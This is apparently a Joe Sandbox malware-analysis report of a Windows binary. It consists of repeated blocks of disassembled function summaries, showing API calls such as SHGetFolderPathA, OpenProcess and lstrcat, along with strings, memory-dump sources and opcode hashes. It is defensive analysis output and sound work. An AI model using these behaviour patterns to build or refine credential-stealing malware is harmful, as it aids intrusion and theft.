                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: String___crt$Type
                                  • String ID:
                                  • API String ID: 2109742289-3916222277
                                  • Opcode ID: 85bcd27a7023ac0fb0b054e2bfe1e72638f1a32777e4f90c7fe5e763bc8d8585
                                  • Instruction ID: bd0f4e46805cd681126c86c9f1cdf59cb4acd6a42ec69897552d27a3a4571ebe
                                  • Opcode Fuzzy Hash: 85bcd27a7023ac0fb0b054e2bfe1e72638f1a32777e4f90c7fe5e763bc8d8585
                                  • Instruction Fuzzy Hash: 7A411D7150875C5EDB318B64CC85FFB7BFE9B45304F1C44E9D98687242E2B19A45AF20
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FB8996
                                    • Part of subcall function 00FDA1C0: std::exception::exception.LIBCMT ref: 00FDA1D5
                                    • Part of subcall function 00FDA1C0: std::exception::exception.LIBCMT ref: 00FDA1FB
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FB89CD
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: invalid string position$string too long
                                  • API String ID: 2002836212-4289949731
                                  • Opcode ID: 3309a884cbb7277ace0100519ea0dba3531ab67121f2b65e90f1b13c5b0fd77b
                                  • Instruction ID: 8abe6abde75daea02ff480b9f27e9d9cdd7cdf414af5c03350d165b2683095ac
                                  • Opcode Fuzzy Hash: 3309a884cbb7277ace0100519ea0dba3531ab67121f2b65e90f1b13c5b0fd77b
                                  • Instruction Fuzzy Hash: AC21DB7230025097CB209A6DE840AAAF79DDBE17E1B14053FF141CB241CB75D842EBA5
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FB8883
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 5ccebd3e6c3c676f15eb65425c5a59c9541fd3aaf3603eaf32394b4e01bbdced
                                  • Instruction ID: 18ff276050c48f9d6a742c968d238f511ee0aa75c3f3b8382e8105d2e7d5a330
                                  • Opcode Fuzzy Hash: 5ccebd3e6c3c676f15eb65425c5a59c9541fd3aaf3603eaf32394b4e01bbdced
                                  • Instruction Fuzzy Hash: C731B7B5E005159BCB08DF59C8906ADBBB6EBC8350F188269E9159B384DB34ED01CB91
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5922
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FD5935
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_std::exception::exception
                                  • String ID: Sec-WebSocket-Version: 13$string too long
                                  • API String ID: 1928653953-3304177573
                                  • Opcode ID: 1abda032cdb4ba137140ac3a856f2b60589b706540c6af464247afb3bcde786b
                                  • Instruction ID: 10189678e0a78ea70bfcf09cfaee77ef7dfc1ee6469a0bbdaad92fa4ee1a7877
                                  • Opcode Fuzzy Hash: 1abda032cdb4ba137140ac3a856f2b60589b706540c6af464247afb3bcde786b
                                  • Instruction Fuzzy Hash: 2D115E31704A40CBD7218A2CA81071977E2ABD1B60F290A5EE09187795CB71D841EBA6
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,00FDA430,000000FF), ref: 00FD3D20
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FD3D27
                                  • wsprintfA.USER32 ref: 00FD3D37
                                    • Part of subcall function 00FD71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00FD71FE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcesslstrcpywsprintf
                                  • String ID: %dx%d
                                  • API String ID: 1695172769-2206825331
                                  • Opcode ID: b50228751b4fa7e309383eec41bc4935f7debfbdb76cac682add8d0b1be0f69c
                                  • Instruction ID: 0176e2fb42d06dccd889178a3376705e97628141da333505769356075746f4c8
                                  • Opcode Fuzzy Hash: b50228751b4fa7e309383eec41bc4935f7debfbdb76cac682add8d0b1be0f69c
                                  • Instruction Fuzzy Hash: EE01C071640708BBE7349BD4DC0AF6ABBADFB46B65F440125FA259B3C0D7B41940CBA2
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FB8737
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA188
                                    • Part of subcall function 00FDA173: std::exception::exception.LIBCMT ref: 00FDA1AE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: std::exception::exception$Xinvalid_argumentstd::_
                                  • String ID: vector<T> too long$yxxx$yxxx
                                  • API String ID: 2002836212-1517697755
                                  • Opcode ID: 52c23bb49208f03de0bb01cc12fe2d22902cf231cef71aae42ae2bb70c8ab05d
                                  • Instruction ID: ec43d4c57acc953462228f8950ee85ac8d805483d28762d1f8fffdb457fd8e72
                                  • Opcode Fuzzy Hash: 52c23bb49208f03de0bb01cc12fe2d22902cf231cef71aae42ae2bb70c8ab05d
                                  • Instruction Fuzzy Hash: 0BF06727F000220B8214A43E8D8449EA94A56E53E433AD665E81AEF299EC70EC83E9D5
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCE544
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCE573
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCE581
                                  • lstrcat.KERNEL32(?,01B9DA70), ref: 00FCE59C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: c1538ce329f38568e6320d292b2d80d7c423a612fc8f6ed36d93e9b91c53e4f5
                                  • Instruction ID: 7439b169febfcd4493a12a4dcc7a4292ac93f86842c8d40b10d027536c1006bc
                                  • Opcode Fuzzy Hash: c1538ce329f38568e6320d292b2d80d7c423a612fc8f6ed36d93e9b91c53e4f5
                                  • Instruction Fuzzy Hash: DB51AA75910108ABCB64EF94DC43EEE73BDFB88300F444469B9169B345DB749E80AFA1
                                  APIs
                                  Strings
                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00FD1FDF, 00FD1FF5, 00FD20B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: strlen
                                  • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                                  • API String ID: 39653677-4138519520
                                  • Opcode ID: 6c99f6447d0d762a78973e2d27dc4db48be17efe73c65303cb3543046672fd2a
                                  • Instruction ID: b6ebe3596569487f5b655d6015176650168dfd83a90d6962a869b505743fe091
                                  • Opcode Fuzzy Hash: 6c99f6447d0d762a78973e2d27dc4db48be17efe73c65303cb3543046672fd2a
                                  • Instruction Fuzzy Hash: 4321E43A9102898BDB20EA35D4487DDF767EF94762F884067C8194B381E236590AF7D6
                                  APIs
                                  • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00FCEBB4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FCEBE3
                                  • lstrcat.KERNEL32(?,00000000), ref: 00FCEBF1
                                  • lstrcat.KERNEL32(?,01B9DF98), ref: 00FCEC0C
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$FolderPathlstrcpy
                                  • String ID:
                                  • API String ID: 818526691-0
                                  • Opcode ID: 810f0010180eea167ec1bcc7a95da41299bd30f6c322e263b9a6cc81e73662f7
                                  • Instruction ID: 3dfb9d187cb9fceeb57e049db09764fdcb4653cc65541ee2f62566a046b600c4
                                  • Opcode Fuzzy Hash: 810f0010180eea167ec1bcc7a95da41299bd30f6c322e263b9a6cc81e73662f7
                                  • Instruction Fuzzy Hash: AB31687191011D9BCB65FFA4DC46BED77B8AF48300F144478B616AB241DB789E84AF90
                                  APIs
                                  • OpenProcess.KERNEL32(00000410,00000000), ref: 00FD4492
                                  • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 00FD44AD
                                  • CloseHandle.KERNEL32(00000000), ref: 00FD44B4
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FD44E7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: d28ced07ab62744ae95ee2e29b8a51179c3248df29b038c3676785edadb7ae8d
                                  • Instruction ID: f5b6dcfe71eb0a4b534132eb340d0da51669ad4fbb751ec24829f417dd8db3f5
                                  • Opcode Fuzzy Hash: d28ced07ab62744ae95ee2e29b8a51179c3248df29b038c3676785edadb7ae8d
                                  • Instruction Fuzzy Hash: D6F0C8B0D016152BE730DBF49C49BEA7AA9AB15314F0405A1EE55DB280D7B498C08B90
                                  APIs
                                  • __getptd.LIBCMT ref: 00FD8FDD
                                    • Part of subcall function 00FD87FF: __amsg_exit.LIBCMT ref: 00FD880F
                                  • __getptd.LIBCMT ref: 00FD8FF4
                                  • __amsg_exit.LIBCMT ref: 00FD9002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00FD9026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 37c2eb23f94d9d231a62b3c0b0068704dd293d99133859e6517c0ca7827a279b
                                  • Instruction ID: db6deaa231cd79da88bb07a29d969ab82147c49e2feabf2edc80d9a5fd103bc9
                                  • Opcode Fuzzy Hash: 37c2eb23f94d9d231a62b3c0b0068704dd293d99133859e6517c0ca7827a279b
                                  • Instruction Fuzzy Hash: ACF0623290C7109AD761BBB86C0A75933A36F00765F2C420BF444AA3D2DF685901F655
                                  APIs
                                  • lstrlen.KERNEL32(------,00FB5BEB), ref: 00FD731B
                                  • lstrcpy.KERNEL32(00000000), ref: 00FD733F
                                  • lstrcat.KERNEL32(?,------), ref: 00FD7349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: efc9f3abffde529582bec334a0c74a4d50722f6bfc3146db88422fb0826e3a93
                                  • Instruction ID: abcf7adca5bfa5dbe512c92c8594bd630b13a74a6590b3df59103a1e6072ce17
                                  • Opcode Fuzzy Hash: efc9f3abffde529582bec334a0c74a4d50722f6bfc3146db88422fb0826e3a93
                                  • Instruction Fuzzy Hash: 9AF0C0749117029FDB68AFB6D848926BAF9EF8471531C882DA89ACB304E734D880DB10
                                  APIs
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1557
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB1579
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB159B
                                    • Part of subcall function 00FB1530: lstrcpy.KERNEL32(00000000,?), ref: 00FB15FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC3422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC3471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00FC3497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: ba090e57a5fac8051118cf1f46653951a0e3f6130570f6275b9df5b244346d10
                                  • Instruction ID: 1915c4a670e0413b7dc3752ade0c20b4e854f33d0f99ee43b56cf3fdd70b1bc5
                                  • Opcode Fuzzy Hash: ba090e57a5fac8051118cf1f46653951a0e3f6130570f6275b9df5b244346d10
                                  • Instruction Fuzzy Hash: 5B12EA71E012028FDB28CF19C655F25B7E5AF44768B1DC0ADE8099B3A6D772ED82DB40
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00FC7CAF
                                    • Part of subcall function 00FC7D40: std::_Xinvalid_argument.LIBCPMT ref: 00FC7D58
                                    • Part of subcall function 00FC7D40: std::_Xinvalid_argument.LIBCPMT ref: 00FC7D76
                                    • Part of subcall function 00FC7D40: std::_Xinvalid_argument.LIBCPMT ref: 00FC7D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: d8a8df2601fc4ee4a78dbc1b1a783f0e1f95068dcd08a8b47b65171dc726e28e
                                  • Instruction ID: 54b850651bab5919fdf6bd7f64190cbdb5a526fa23fd149adf7a64ab660408ec
                                  • Opcode Fuzzy Hash: d8a8df2601fc4ee4a78dbc1b1a783f0e1f95068dcd08a8b47b65171dc726e28e
                                  • Instruction Fuzzy Hash: 423109723083138BD724ED6CE981F6AF7E9EF91760B20452EF442CB641C7719C419BA4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00FB6F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00FB6F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.000000000147E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001488000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001495000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745809416.0000000001496000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745899388.000000000162C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745912060.000000000162D000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_fb0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: b90fa749ec69dcaf298fdec06d0d312d80a280fcc38da73d420fa56ab86261b8
                                  • Instruction ID: bf69cda9f68126d9cd28bf1117ae3019856bcd0562770dbc0c2ea4b8e73f2b4c
                                  • Opcode Fuzzy Hash: b90fa749ec69dcaf298fdec06d0d312d80a280fcc38da73d420fa56ab86261b8
                                  • Instruction Fuzzy Hash: 5D218EB0A007019BEB20CB61DC84BB673E8EB44714F44487CF946CBA84F7B9E985DB50
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,00FDCFEC), ref: 00FD244C
                                  • lstrlen.KERNEL32(00000000), ref: 00FD24E9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00FD2570
                                  • lstrlen.KERNEL32(00000000), ref: 00FD2577
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1745459108.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                   • Associated: 00000000.00000002.1745447617.0000000000FB0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000000FE7000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000103E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.0000000001046000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.000000000105F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745459108.00000000011E8000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745592433.00000000011FA000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.00000000011FC000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001380000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1745604410.0000000001456000.00000040.00000001.01000000.00000003.sdmp
